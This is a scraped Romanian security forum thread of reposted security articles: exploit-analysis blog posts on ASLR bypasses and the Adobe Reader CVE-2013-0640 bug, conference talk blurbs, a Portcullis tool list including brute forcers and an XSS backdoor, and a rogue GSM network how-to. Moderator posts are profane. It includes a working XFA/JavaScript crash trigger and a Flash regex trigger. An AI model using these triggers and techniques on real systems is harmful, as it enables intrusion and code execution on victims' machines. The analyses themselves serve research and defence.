Nytro

Hack3rcon 4 - Ms08-067 Under The Hood - John Degruyter Description: The purpose of this talk is to get a better understanding of using a debugger and looking at the low-level process of exploiting a software vulnerability. We will be visiting our faithful old friend, ms08_067. First, we will look at the structure of the metasploit module and the functions that make it up. Then we will move to the victim’s system where we will be firing up a debugger and taking a look at the vulnerable process, library and function. Next, we will launch the metasploit module from our attack system and watch the memory corruption. Finally, we’ll follow the exploit as it disables DEP in the acgenral.dll module and then finally jump to our shellcode for a win. Speakers John Degruyter For More Information please visit : - Hack3rCon^4 - Eye of the Storm Hack3rcon 4 Videos (Hacking Illustrated Series InfoSec Tutorial Videos) Sursa: Hack3rcon 4 - Ms08-067 Under The Hood - John Degruyter

Hack3rcon 4 - Advanced Evasion Techniques - Pwning The Next Generation Security Products (Keynote) - David Kennedy Description: We know anti-virus is dead, there's no more beating it with a stick and it's easy to get around. What about the next set of security products and how do they actually work. Preventive technology is advancing and the attacks are getting slightly harder (albeit not much). This talk goes into advanced evasion techniques for getting around some of the new pieces of technology that we face out there. Everything from Next Generation technologies, virtualization technologies, application firewalls, and more - this talk will show how to effectively test and identify how to best get around what we're seeing out there. It's time to pwn the next generation of security product lines. David Kennedy (@dave_rel1k) is founder and principal security consultant of TrustedSec - An information security consulting firm located in Cleveland Ohio. David was the former Chief Security Officer (CSO) for a Fortune 1000 where he ran the entire information security program. Kennedy is a co-author of the book "Metasploit: The Penetration Testers Guide," the creator of the Social-Engineer Toolkit (SET), and Artillery. Kennedy has presented on a number of occasions at Black Hat, Defcon, ShmooCon, BSIDES, Infosec World, Notacon, AIDE, ISACA, ISSA, Infragard, Infosec Summit, Hack3rCon and a number of other security-related conferences. Kennedy has been interviewed by several news organizations including CNN, Fox News, and BBC World News. Kennedy was formally on the Back|Track development team and Exploit-DB team and co-host of the Social-Engineer.org podcast. Kennedy is one of the co-authors of the Penetration Testing Execution Standard (PTES); a framework designed to fix the penetration testing industry. Kennedy is the co-founder of DerbyCon, a large-scale conference in Louisville Kentucky. Prior to Diebold, Kennedy was a VP of Consulting and Partner of a mid-size information security consulting company running the security consulting practice. Prior to the private sector, Kennedy worked for the United States Marine Corps and deployed to Iraq twice for intelligence related missions. For More Information please visit : - Hack3rCon^4 - Eye of the Storm Hack3rcon 4 Videos (Hacking Illustrated Series InfoSec Tutorial Videos) Sursa: Hack3rcon 4 - Advanced Evasion Techniques - Pwning The Next Generation Security Products (Keynote) - David Kennedy

S-a rezolvat problema...

Tocmai pentru a preveni milogi ca tine era inchisa. Ban.

Ban. Fara milogeli azi.

Super. Noi, muritori de rand, nu putem face mare lucru. Dar daca isi pun pe cap o gramada de state, poate o sa se faca ceva.

Da, spam. Te invarti cu masina prin oras si trimiti mesaje in disperare.

[h=1]iLikeIT. Cum sa-ti creezi propria retea de telefonie mobila, ca sa ceri ajutor dupa un cutremur[/h]Dupa cum se stie, in cazul producerii unui cutremur cu magnitudine mare, cad retelele de electricitate si cele de telefonie. Si atunci, cum facem sa transmitem un mesaj de urgenta catre salvatori daca ramanem blocati intr-un loc? Solutia este destul de simpla si a fost prezentata la iLikeIT cu ajutorul lui Bogdan Alecu, specialist in securitate mobila. Mai multe detalii la adresa: http://www.m-sec.net Trebuie precizat de la bun inceput ca este ilegal sa va creati propria retea de telefonie mobila, iar aceasta solutie trebuie aplicata numai in cazuri de extrema urgenta. Aparatura de care aveti nevoie este urmatoarea: un laptop, un stick USB pe care se afla un soft special si un telefon simplu, indiferent de model si indiferent cat de vechi este acesta. In cazul in care nu mai exista retea de electricitate, laptopul il puteti folosi datorita bateriei incorporate. Telefonul se conecteaza la laptop cu ajutorul unui banal cablu de date. De asemenea, softul de pe stickul USB nu trebuie instalat, el poate fi rulat direct de pe dispozitivul mobil. Iata cateva detalii: 1. Sistemul de operare este Ubuntu, iar pe el a fost instalat softul care controleaza toata reteaua de telefonie. Acest soft se numeste OpenBTS si poate fi descarcat gratuit de la aceasta adresa. 2. Tot sistemul de operare a fost instalat pe un stick USB si a rulat de pe acesta 3. Intregul sistem poate fi configurat sa ruleze si sa porneasca automat, inclusiv de pe un notebook care nu este pretentios la cerinte (4GB RAM, port USB 2.0, procesor dual-core) Telefonul folosit pe post de statie emisie-receptie este un Motorola C123 conectat prin USB pe care OpenBTS incarca propriul firmware. Cu alte cuvinte, pe acest telefon se incarca un alt sistem de operare open-source, iar frecventa de emisie precum si celelalte informatii privind modalitatea de operare sunt controlate de catre OpenBTS. 4. Desigur ca, in locul acestui telefon, se poate utiliza o antena GSM cu amplificator, pentru a acoperi o suprafata mai mare. 5. Noua retea creata poate fi folosita atat pentru a trimite mesaje de avertizare, cat si in scop de localizare a eventualelor victime. Fiind o retea ce permite controlul total din partea utilizatorului, se poate folosi aceasta modalitate portabila pentru a localiza victimele. Astfel, se poate limita puterea de emisie, dar si distanta pe care emite (in pasi de cate 500m), iar in momentul in care un telefon nou se inregistreaza in retea, operatorul e instiintat de acest lucru. Astfel, reduci aria de cautare doar in acea zona limitata de pana in 500m. 6. Ca sa inteleaga toata lumea, ideea este urmatoarea: nu conteaza daca toti operatorii de telefonie mobila din Romania nu functioneaza in acel moment. In momentul in care va creati propria retea de telefonie, celelalte telefoane care se afla atunci in reteaua de acoperire vor vedea automat reteaua voastra proprie si se vor conecta la ea. 7. De asemenea, nu conteaza daca telefonul este codat intr-o anumita retea de telefonie: Vodafone, Orange, Cosmote sau Digi. Sursa si video: iLikeIT. Cum sa-ti creezi propria retea de telefonie mobila, ca sa ceri ajutor dupa un cutremur Asta se poate face util. Veniti voi cu idei pentru facut rahaturi

"from people's online email address books and instant messaging (IM) "buddy lists" Asta e urat si nu e legal. Insa de cele mai multe ori adresele de mail sunt facute prea publice.

Tutorial: "Cum sa iei ban"

ASLR Bypass Apocalypse in Recent Zero-Day Exploits October 15, 2013 | By Xiaobo Chen ASLR (Address Space Layout Randomization) is one of the most effective protection mechanisms in modern operation systems. But it’s not perfect. Many recent APT attacks have used innovative techniques to bypass ASLR bypass techniques. Here are just a few interesting bypass techniques that we have tracked in the past year: Using non-ASLR modules Modifying the BSTR length/null terminator Modifying the Array object The following sections explain each of these techniques in detail. Non-ASLR modules Loading a non-ASLR module is the easiest and most popular way to defeat ASLR protection. Two popular non-ASLR modules are used in IE zero-day exploits: MSVCR71.DLL and HXDS.DLL. MSVCR71.DLL, JRE 1.6.x is shipped an old version of the Microsoft Visual C Runtime Library that was not compiled with the /DYNAMICBASE option. By default, this DLL is loaded into the IE process at a fixed location in the following OS and IE combinations: Windows 7 and Internet Explorer 8 Windows 7 and Internet Explorer 9 HXDS.DLL, shipped from MS Office 2010/2007, is not compiled with ASLR. This technique was first described in here, and is now the most frequently used ASLR bypass for IE 8/9 on Windows 7. This DLL is loaded when the browser loads a page with ‘ms-help://’ in the URL. The following zero-day exploits used at least one of these techniques to bypass ASLR: CVE-2013-3893, CVE2013-1347, CVE-2012-4969, CVE-2012-4792. Limitations The non-ASLR module technique requires IE 8 and IE 9 to run with old software such as JRE 1.6 or Office 2007/2010. Upgrading to the latest versions of Java/Office can prevent this type of attack. Modify the BSTR length/null terminator This technique first appears in the 2010 Pwn2Own IE 8 exploit by Peter Vreugdenhil. It applies only to specific types of vulnerabilities that can overwrite memory, such as buffer overflow, arbitrary memory write, and increasing or decreasing the content of a memory pointer. The arbitrary memory write does not directly control EIP. Most of the time, the exploit overwrites important program data such as function pointers to execute code. For attackers, the good thing about these types of vulnerabilities is that they can corrupt the length of a BSTR so that using the BSTR can access memory outside of its original boundaries. Such accesses may disclose memory addresses that can be used to pinpoint libraries suitable for ROP. Once the exploit has bypassed ASLR in this way, it can then use the same memory corruption bug to control EIP. Few vulnerabilities can be used to modify the BSTR length. For example, some vulnerabilities can only increase/decrease memory pointers by one or two bytes. In this case, the attacker can modify the null terminator of a BSTR to concatenate the string with the next object. Subsequent accesses to the modified BSTR have the concatenated object’s content as part of BSTR, where attackers can usually find information related to DLL base addresses. CVE-2013-0640 The Adobe XFA zero-day exploit uses this technique to find the AcroForm.api base address and builds a ROP chain dynamically to bypass ASLR and DEP. With this vulnerability, the exploit can decrease a controllable memory pointer before calling the function pointer from its vftable: Consider the following memory layout before the DEC operation: [string][null][non-null data][object] After the DEC operation (in my tests, it is decreased twice) the memory becomes: [string][\xfe][non-null data][object] For further details, refer to the technique write-up from the immunityinc’s blog. Limitations This technique usually requires multiple writes to leak the necessary info, and the exploit writer has to carefully craft the heap layout to ensure that the length field is corrupted instead of other objects in memory. Since IE 9, Microsoft has used Nozzle to prevent heap spraying/fengshui, so sometimes the attacker must use the VBArray technique to craft the heap layout. Modify the Array object The array object length modification is similar to the BSTR length modification: they both require a certain class of “user-friendly” vulnerabilities. Even batter, from the attacker’s view, is that once the length changes, the attacker can also arbitrarily read from or write to memory — or basically take control of the whole process flow and achieve code execution. Here is the list of known zero-day exploits using this technique: CVE-2013-0634 This exploit involves Adobe Flash player regex handling buffer overflow. The attacker overwrites the length of a Vector.<Number> object, and then reads more memory content to get base address of flash.ocx. Here’s how the exploit works: Set up a continuous memory layout by allocating the following objects”: Free the <Number> object at index 1 of the above objects as follows: obj[1] = null; Allocate the new RegExp object. This allocation reuses memory in the obj[1] position as follows: boom = "(?i)()()(?-i)||||||||||||||||||||||||"; var trigger = new RegExp(boom, ""); Later, the malformed expression overwrites the length of aVector.<Number> object in obj[2] to enlarge it. With a corrupted size, the attacker can use obj[2] to read from or write to memory in a huge region to locate the flash.ocx base address and overwrite a vftable to execute the payload. CVE-2013-3163 This vulnerability involves a IE CBlockContainerBlock object use-after-free error. This exploit is similar to CVE-2013-0634, but more sophisticated. Basically, this vulnerability modifies the arbitrary memory content using an OR instruction. This instruction is something like the following: or dword ptr [esi+8],20000h Here’s how it works: First, the attacker sprays the target heap memory with Vector.<uint> objects as follows:. After the spray, those objects are stored aligned in a stable memory address. For example: The first dword, 0x03f0, is the length of the Vector.<uint> object, and the yellow marked values correspond to the values in above spray code. If the attacker sets the esi + 8 point to 0x03f0, the size becomes 0x0203f0 after the OR operation — which is much larger than the original size. With the larger access range, the attacker can change the next object length to 0x3FFFFFF0. From there, the attacker can access the whole memory space in the IE process. ASLR is useless because the attacker can retrieve the entire DLL images for kernel32/NTDLL directly from memory. By dynamically searching for stack pivot gadgets in the text section and locating the ZwProtectVirtualMemory native API address from the IAT, the attacker can construct a ROP chain to change the memory attribute and bypass the DEP as follows: By crafting the memory layout, the attacker also allocates a Vector.<object> that contains the flash.Media.Sound() object. The attacker uses the corrupted Vector.<uint> object to search the sound object in memory and overwrite it’s vftable to point to ROP payload and shellcode. CVE-2013-1690 The use-after-free vulnerability in Firefox’s DocumentViewerImpl object allows the user to write a word value 0×0001 into an arbitrary memory location as follows: In above code, all the variables that start with “m” are read from the user-controlled object. If the user can set the object to meet the condition in the second “if” statement, it forces the code path into the setImageAnimationMode() call, where the memory write is triggered. Inside the setImageAnimationMode(), the code looks like the following: In this exploit, the attacker tries to use ArrayBuffer to craft the heap layout. In the following code, each ArrayBuffer element for var2 has the original size 0xff004. After triggering the vulnerability, the attacker increases the size of the array to to 0x010ff004. The attacker can also locate this ArrayBuffer by comparing the byteLength in JavaScript. Then, the attacker can read to or write from memory with the corrupted ArrayBuffer. In this case, the attacker choose to disclosure the NTDLL base address from SharedUserData (0x7ffe0300), and manually hardcoded the offset to construct the ROP payload. CVE-2013-1493 This vulnerability involves a JAVA CMM integer overflow that allows overwriting the array length field in memory. During exploitation, the array length actually expands to 0x7fffffff, and the attacker can search for the securityManager object in memory and null it to break the sandbox. This technique is much more effective than overwriting function pointers and dealing with ASLR/DEP to get native code execution. The Array object modification technique is much better than other techniques. For the Flash ActionScript vector technique, there are no heap spray mitigations at all. As long as you have a memory-write vulnerability, it is easily implemented. Summary The following table outlines recent APT zero-day exploits and what bypass techniques they used: Conclusion ASLR bypassing has become more and more common in zero-day attacks. We have seen previous IE zero-day exploits using Microsoft Office non-ASLR DLL to bypass it, and Microsoft also did some mitigation in their latest OS and browser to prevent use of the non-ASLR module to defeat ASLR. Because the old technique will no longer work and can be easily detected, cybercriminals will have to use the advanced exploit technique. But for specific vulnerabilities that allow writing memory, combining the Vector.<uint> and Vector.<object> is more reliable and flexible. With just one shot, extending the exploit from writing a single byte to reading or writing gigabytes is easy and works for the latest OS and browser regardless of the OS, application, or language version. Many researchers have published research on ASLR bypassing, such as Dion Blazakis’s JIT spray and Yuyang’s LdrHotPatchRoutine technique. But so far we haven’t seen any zero-day exploit leveraging them in the wild. The reason could be that these techniques are generic approaches to defeating ASLR. And they are usually fixed quickly after going public. But there is no generic way to fix vulnerability-specific issues. In the future, expect more and more zero-day exploits using similar or more advanced techniques. We may need new mitigations in our OSs and security products to defeat them. Thanks again to Dan Caselden and Yichong Lin for their help with this analysis. Sursa: ASLR Bypass Apocalypse in Recent Zero-Day Exploits | FireEye Blog

Salut, Au aparut niste probleme cu categoriile Offtopic, Cereri si Ajutor (+ altele). Se pare ca nu se mai pot deschide topicuri noi in acele categorii. Nici macar nu se mai poate posta. Promit ca maine seara voi rezolva problema. Pana atunci invatati un singur lucru: NU MAI FITI MILOGI. Tot urmaresc forumul si sper sa vad macar 2-3 persoane care ies in fata si demonstreaza ca au mentalitate si ca vor sa ajute comunitatea. Dar fiecare isi vede de propria persoana, nimeni nu ar posta ceva util pentru ceilalti din comunitate. Daca veti verifica si voi ultimele posturi veti vedea categoriile principale de discutii: Offtopic, Cereri si Ajutor. Stiti sa cereti ajutorul, sa intindeti mana, dar nu stiti sa ajutati la randul vostru. Cersetori, milogi, asta sunteti. Asadar, 24 de ore, deocamdata, nu veti putea posta in acele categorii. Aduceti o contributie si voi. Faceti ceva util si pentru ceilalti, nu doar pentru voi. Daca nu va convine decizia va dati cu curul de pamant si imi sugeti pula. Muie.

Tools FreeRDP-pth (20/10/2013) - FreeRDP-pth is a slightly modified version of FreeRDP that tries to authenticate using a password hash instead of a password. This work only against RDP v8.1 servers (Windows 2012 R2 at the time of writing) and even then, only for members of the administrators groups. Refer to companion blog post for more information about Restricted Mode and pass-the-hash. UDP Protocol Analysis – Interactive Python Tool (9/9/2013) - UDP protocol analysis is a python module which can be used in scripted analysis or interactively using ipython. Local MySQL Password Bruteforcer (15/2/2013) - Local MySQL Password Bruteforcer is a python script to assess the strength of the local MySQL access passwords. HeaderCheck (15/2/2013) - HeaderCheck is a python script used to check the security settings of various headers returned by web servers. ssl-cipher-suite-enum (13/2/2013) - ssl-cipher-suite-enum is a perl script to enumerate supported SSL cipher suites supported by network services (principally HTTPS). UNIXSocketScanner (31/1/2013) - UNIXSocketScanner is a perl script to locally enumerate UNIX domain sockets. get-dhcp-opts (12/12/2012) - get-dhcp-opts is a tool to discover DHCP/BOOTP servers on your LAN, and dump the DHCP/BOOTP options. VulnApp (15/9/2012) - VulnApp is a vulnerable web application written in ASP.net. rdp-sec-check (15/7/2012) - rdp-sec-check is a perl script to enumerate security settings of an RDP Service (AKA Terminal Services). nopc (3/7/2012) - nopc is a Nessus based UNIX patch checker. It utilises Nessus’ nasls and instructs you on what data you need to manually get from the system to perform that patch check. This was developed for situation when network connectivity to the systems under review is not possible. secdump (24/3/2012) - secdump is a simple meterpreter module that uploads and runs gsecdump. Nothing fancy, just a time saver. SSHatter (16/2/2011) - SSHatter is a perl script to perform brute force attacks on SSH. hoppy (9/10/2009) - hoppy is python script to probe HTTP options and perform scanning for information disclosure issues. ManySSL (9/12/2008) - ManySSL is a perl script to enumerate supported SSL cipher suites supported by network services (principally HTTPS). udp-proto-scanner (26/11/2008) - udp-proto-scanner is a perl script which discovers UDP services by sending triggers to a list of hosts MS08-067 check (18/11/2008) - MS08-067 check is python script which can anonymously check if a target machine or a list of target machines are affected by MS08-067 vulnerability. polenum (30/10/2008) - polenum is a python script which can be used to get the password policy from a Windows machine. vessl (30/10/2008) - vessl is a bash script that can fetch and verify the SSL certificate of a remote server. enum4linux (16/9/2008) - A Linux alternative to enum.exe for enumerating data from Windows and Samba hosts. phrasen|drescher (27/6/2008) - A tool for bruteforce guessing pass phrases, password hashes or remote accounts of various services. BSQL brute forcer V2 (18/6/2008) - Updated version of the Blind SQL Injection Brute Forcer from www.514.es. Works against PostgreSQL, MySQL, MSSQL and Oracle and supports custom SQL queries. acccheck (9/4/2008) - The tool is designed as a password dictionary attack tool that targets windows authentication via the SMB protocol. It is really a wrapper script around the ‘smbclient’ binary, and as a result is dependent on it for its execution. MIBparse (7/4/2008) - MIBparse.pl has been designed as an offline parser to quickly parse output from SNMP tools such as ‘snmpwalk’. nbtscan-1.5.2 (3/4/2008) - NBTscan is a program for scanning IP networks for NetBIOS name information. XSS Tunnel (2/4/2008) - XSS Tunnel is a standard HTTP proxy which sits on an attacker’s system. Any tool that is configured to use it will tunnel its traffic through the active XSS Channel on the XSS Shell server. Banner Grab (2/4/2008) - BannerGrab is a tool that performs connection, trigger-based and basic information collection from network services. viewstate (2/4/2008) - Viewstate is an ASP.Net viewstate decoder, checker, parser and encoder. Sun Patch Check (2/4/2008) - Sun Patch Check lists missing security patches by comparing the output from the Sun Solaris “showrev” command to that from the Sun recommended patch list. XSS Shell (2/4/2008) - XSS Shell is a powerful XSS backdoor, in XSS Shell one can interactively send requests and get responses from victim and it allows you to keep the control of session. sucrack (31/3/2008) - sucrack is a multithreaded Linux/UNIX tool for brute-force cracking local user accounts via su. rmiInfo (31/3/2008) - A tool for extracting information from Java Remote Method Invocation (RMI) services. onesixtyone (31/3/2008) - An enhanced version of Solar Eclipse’s SNMP Community string guessing tool. http-dir-enum (28/3/2008) - A command-line tool for bruteforce-guessing directory and filenames on web servers. BSQL Hacker (16/1/2008) - BSQL (Blind SQL) Hacker is an automated SQL Injection Framework / Tool designed to exploit SQL injection vulnerabilities virtually in any database. Sursa: http://labs.portcullis.co.uk/tools/

[h=1]Deep Blind SQL Injection[/h] Deep Blind SQL Injection is a new way to exploit Blind SQL Injections with a 66% reduction in the number of requests. However it is still possible to retrieve data, moreover it is possible with a 66% reduction in the number of requests made of the server, requiring two rather than six requests to retrieve each char. Ferruh Mavituna www.portcullis-security.com Blind SQL Injection attacks are described in several papers1. If the injection point is completely blind2 then the only way3 to extract data is using time based attacks like WAITFOR DELAY, BENCHMARK etc. When it comes to reading data there are two known ways, 1. Reading data bit by bit 2. Reading data through a binary search algorithm with character patterns Both methods have a one request – one response limit and on average for each char you need to make six requests to the server. In Deep Blind SQL Injection reading data is more complex than in classic blind injection. However it is still possible to retrieve data, moreover it is possible with a 66% reduction in the number of requests made of the server, requiring two rather than six requests to retrieve each char. Deep Blind SQL Injection works well within MS SQL Server and may work in other databases such as like ORACLE, PostgreSQL etc. This method of injection, which retrieves more that one response per request is achieved using time delay differences. For example if the first half byte of char is 6, the database is going to wait for 12 seconds, if second half byte of char is 1 it?s going to wait for 2 seconds. An attacker should store server response times and divide them by 2 to understand the response. Finally, in 2 requests we got 0x61 which is „a?. Obviously depending on the condition it?s possible to use larger or smaller dividers than 2. Download: http://labs.portcullis.co.uk/download/Deep_Blind_SQL_Injection.pdf

XSS Tunnelling Tunnelling HTTP traffic through XSS Channels Ferruh Mavituna www.portcullis-security.com XSS Tunnelling ................................................................................................................1 About XSS Tunnelling..................................................................................................1 What Is An XSS Channel?........................................................................................... 2 How Does XSS Shell Work?........................................................................................ 2 Points of Interest ..................................................................................................... 4 Why Is It Better Than The Classic XSS Attacks?.................................................... 5 What Is XSS Tunnelling?................................................................................................ 5 What Is An XSS Tunnel? ................................................................................................ 5 Why Tunnel HTTP Traffic Through An XSS Channel? ................................................. 6 Benefits Of XSS Tunnelling............................................................................................ 7 How Does XSS Tunnel Work?........................................................................................8 An Attack Process ....................................................................................................... 9 Download: http://labs.portcullis.co.uk/download/XSS-Tunnelling.pdf

SSL GOOD PRACTICE GUIDE VERSION: 1.0 DATE: 20/09/2013 TASK NUMBER: SSL_Whitepaper PREPARED BY Mike W. Emery Researcher Portcullis Computer Security Limited The Grange Barn, Pike's End Pinner, Middlesex HA5 2EX United Kingdom CONTENTS 1 INTRODUCTION 2 SSL BASICS 3 RECOMMENDATIONS 4 AREAS OF CONCERN 5 SAMPLE IMPLEMENTATIONS APPENDIX A: ABOUT PORTCULLIS COMPUTER SECURITY LIMITED 15 Download: http://labs.portcullis.co.uk/download/SSLGPG.pdf

Pool Blade: A new approach for kernel pool exploitation Abstract In recent years many methods have been discussed regarding exploitation of pool overflow corruptions. Most of these methods are based on the architecture of Pool manager in windows. In this paper I am going to discuss a generic method that is based on kernel objects and not the pool manager and because of the nature of this technic it is possible to exploit pool overflow vulnerabilities easier and more reliable. So I Introduce Pool Blade helper class that let us exploit pool overflow in a very short time by just calling some interface and triggering the vulnerability. Pool blade and the technic discussed here is just supported by windows XP/2003/vista but it can be extended to support more recent windows operating systems. Q: Why Pool blade? A: Because this method is fast and reliable Q: How much reliable? A: By this technic we don’t corrupt anything so the exploit works 100% Q: Fast? A: You have a pool overflow, you can exploit it in 5 minutes by just knowing size the vulnerable buffer Q: What is the impact? A: Everyone can exploit local pool overflows on windows easily and reliably to get escalated privilege. Q: What PoolBlade is not? A: It cannot be used to exploit pool overflow on windows 7 and for small buffer sizes you should find another proper objects. And of course it can be used only in Non-paged pool. Q: How it can be used? A: You can use the PoolBlade helper class or read the document and implement more customized version for your own purpose. The method and the helper class is demonstrated by an antivirus driver vulnerability in the following research paper . White-paper : PoolBlade Exploit-code: AhnlabV3MedCoreD Video : The demonstrated vulnerability is about the Ahnlab V3 internet security product. Of course the vulnerability is reported to vendor a few month ago. Final note : as you may know our windows exploitation course which contain kernel exploitation is just released if you like you can take it now ! Sursa: https://zdresearch.com/pool-blade-a-new-approach-for-kernel-pool-exploitation/

[h=1]NFTables IPTables-Replacement Queued For Linux 3.13[/h] [h=2]Posted by Michael Larabel on October 19, 2013[/h]NFTables is a new firewall subsystem / packet filtering engine for the Linux kernel that is poised to replace iptables. NFTables has been in development for several years by the upstream author of Netfilter. This new nftables system is set to be merged now into the Linux 3.13 kernel. NFTables has been in development for years and to replace IPTables by offering a simpler kernel ABI, reduce code duplication, improved error reporting, and provide more efficient support of filtering rules. Beyond IPTables, it also replaces the ip6tables, arptables, and ebtables frameworks but nftables does offer a compatibility layer to iptables support. For those into networking and wanting to learn more about NFTables, visit its Netfilter.org project page. Earlier this week a pull request was sent in for pulling in nf_tables for the next Linux kernel release through the net-next branch. The pull request was accepted and is now living in the net-next Git repository for Linux 3.13. IPTables won't die off in Linux 3.13 as there's still work ahead for NFTables, but those wanting to try out the new code when it's mainlined can find this how-to guide. Sursa: [Phoronix] NFTables IPTables-Replacement Queued For Linux 3.13

[h=1]CVE-2013-0640: Adobe Reader XFA oneOfChild Un-initialized memory vulnerability (part 1)[/h] Published 26/09/2013 | By MTB This document aims to present a technical report of the CVE-2013-0640 vulnerability targeting Adobe Reader version 9, 10 and 11. It was first spotted in February 2013 and has been used actively in the wild. This is the first article of a set. It covers the full detailed analysis of the bug. Adobe Reader is an application software developed by Adobe Systems to view files in Portable Document Format (PDF). Adobe XML forms architecture (XFA) are XML specifications for forms to be embedded in a PDF document. There were first introduced in the PDF 1.5 file format specification. They are not compatible with AcroForms. The form itself is saved internally in the PDF. There is a bug when dealing with the forms in a specific way. [h=2]Binary Information[/h] [TABLE] [TR] [TD]Name:[/TD] [TD]AcroForm_api[/TD] [/TR] [TR] [TD]Base address:[/TD] [TD]0×20800000[/TD] [/TR] [TR] [TD]File version:[/TD] [TD]9.5.0.270[/TD] [/TR] [TR] [TD]Default path:[/TD] [TD]C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\AcroForm.api[/TD] [/TR] [/TABLE] [h=2]Analysis[/h] [h=3]Trigger[/h] The proof of concept consists of an embedded XFA form that is being manipulated using JavaScript. The form by itself contains two subforms: The first contains a choiceList object. The second one contains a simple draw object. <template xmlns="http://www.xfa.org/schema/xfa-template/2.8/"> <subform name="form1"> <pageSet> <pageArea name="page1"> <contentArea /> <subform> <field name="field0"> <ui><choiceList></choiceList></ui> </field> </subform> </pageArea> </pageSet> <subform> <draw name="rect1" /> </subform> </subform> </template> In order to trigger the bug the JavaScript code first saves a reference to the choiceList object for later use. Then it changes the property keep.previous of the draw object in the second subform to contentArea. Once done, the choiceList object is re-attached to the first subform. This triggers the bug. function Trigger { MessWithTheMemory(); xfa.resolveNode("xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#ui").oneOfChild = choiceList; } var choiceList = null; function Start() { choiceList = xfa.resolveNode("xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#ui[0].#choiceList[0]"); xfa.resolveNode("xfa[0].form[0].form1[0].#subform[0].rect1").keep.previous = "contentArea"; ddd = app.setTimeOut("Trigger();", 1); } Start(); [h=3]Binary analysis[/h] Adobe Reader crashes in the AcroForm_api module. Just before the crash a function located at address 0x20907FA0 is called. For convenience this function is called UseTheUninitializedValue. First it calls a function at 0x209D76AE named GetTheBrokenObject. It then increments an attribute of the object, probably a reference count. Finally the attribute at 0x3c is evaluated. If is is not NULL a function at 0x209063B4 named crash_here is called using the object attribute at 0x3c. .text:20907FA0 UseTheUninitializedValue .text:20907FA0 .text:20907FA0 var_10 = dword ptr -10h .text:20907FA0 var_4 = dword ptr -4g .text:20907FA0 arg_0 = dword ptr 8 .text:20907FA0 arg_4 = dword ptr 0Ch .text:20907FA0 arg_8 = dword ptr 10h .text:20907FA0 .text:20907FA0 push 4 .text:20907FA2 mov eax, offset sub_20CE45C9 .text:20907FA7 call __EH_prolog3 .text:20907FAC mov ebx, ecx .text:20907FAE and [ebp+var_10], 0 .text:20907FB2 push [ebp+arg_8] .text:20907FB5 lea eax, [ebp+arg_8] .text:20907FB8 push [ebp+arg_4] .text:20907FBB push eax .text:20907FBC call GetTheBrokenObject // Get the uninitialized object from here. .text:20907FC1 mov esi, [eax] .text:20907FC3 test esi, esi .text:20907FC5 mov [ebp+arg_4], esi .text:20907FC8 jz short loc_20907FCD .text:20907FCA inc dword ptr [esi+4] // Reference counter? .text:20907FCD .text:20907FCD loc_20907FCD: .text:20907FCD lea ecx, [ebp+arg_8] .text:20907FD0 mov [ebp+var_4], 1 .text:20907FD7 call sub_208A7FA1 .text:20907FDC mov edi, [ebx+3Ch] .text:20907FDF test edi, edi .text:20907FE1 jz short loc_20908012 .text:20907FE3 cmp dword ptr [esi+3Ch], 0 // If 0, skip the call. .text:20907FE7 jz short loc_20907FF2 .text:20907FE9 mov ecx, [esi+3Ch] // Uninitialized memory here. .text:20907FEC push ebx .text:20907FED call crash_here The value coming from ESI+0x3c is used as a pointer. However the value is invalid, Adobe Reader crashes when dereferencing it. .text:209063B4 crash_here .text:209063B4 .text:209063B4 arg_0 = dword ptr 4 .text:209063B4 .text:209063B4 push esi .text:209063B5 push edi .text:209063B6 mov edi, ecx // EDI is invalid. .text:209063B8 mov esi, [edi+40h] .text:209063BB test esi, esi .text:209063BD jz short loc_209063FE ... .text:209063FE loc_209063FE: .text:209063FE .text:209063FE pop edi .text:209063FF pop esi .text:20906400 retn 4 .text:20906400 crash_here endp In order to find the reason EDI contains an invalid value, we need to go back to the constructor of the object. It can be found at 0x209D8D71 in a function named InitializeBrokenObject. This function is the constructor of the object. As seen from the disassembled code, the value at 0x3c is never initialized. .text:209D8D71 InitializeBrokenObject .text:209D8D71 .text:209D8D71 arg_0 = dword ptr 4 .text:209D8D71 arg_4 = dword ptr 8 .text:209D8D71 arg_8 = dword ptr 0Ch .text:209D8D71 .text:209D8D71 push esi .text:209D8D72 push [esp+4+arg_0] .text:209D8D76 mov esi, ecx .text:209D8D78 call sub_209E7137 // ECX comes from the second argument. .text:209D8D7D mov ecx, [esp+4+arg_4] // vtable. .text:209D8D81 mov dword ptr [esi], offset broken_object .text:209D8D87 mov eax, [ecx] .text:209D8D89 xor edx, edx .text:209D8D8B cmp eax, edx .text:209D8D8D mov [esi+24h], eax .text:209D8D90 jz short loc_209D8D95 .text:209D8D92 inc dword ptr [eax+4] .text:209D8D95 .text:209D8D95 loc_209D8D95: // Offset 0x3c is not set. .text:209D8D95 mov eax, [esp+4+arg_8] .text:209D8D99 mov [esi+2Ch], eax .text:209D8D9C mov [esi+30h], edx .text:209D8D9F mov [esi+34h], edx .text:209D8DA2 mov [esi+38h], edx .text:209D8DA5 mov eax, off_20E93D74 .text:209D8DAA and dword ptr [esi+28h], 0FFFFFFF0h .text:209D8DAE mov [esi+0Ch], eax .text:209D8DB1 mov dword ptr [esi+10h], 0C9h .text:209D8DB8 mov ecx, [ecx] .text:209D8DBA cmp ecx, edx .text:209D8DBC jz short loc_209D8DC1 .text:209D8DBE mov [ecx+3Ch], esi .text:209D8DC1 .text:209D8DC1 loc_209D8DC1: .text:209D8DC1 mov eax, esi .text:209D8DC3 pop esi .text:209D8DC4 retn 0Ch .text:209D8DC4 InitializeBrokenObject endp Depending on the previous memory usage, the value at ESI+0x3C may vary. If it is 0, the call is skipped and nothing happens. Otherwise a crash may occur. [h=2]Conclusion[/h] This concludes the detailed analysis of the bug. The goal next is to replace the un-initialized data by fully controlled values and to leverage the bug into code execution. This involves a bit of heap massage and it will be the main focus of the second article. [h=2]References[/h] Adobe’s advisory: APSA13-02 Download target version: Adobe Acrobat 10 for Windows XFA Specification Sursa: CVE-2013-0640: Adobe Reader XFA oneOfChild Un-initialized memory vulnerability (part 1) | Portcullis LabsPortcullis Labs

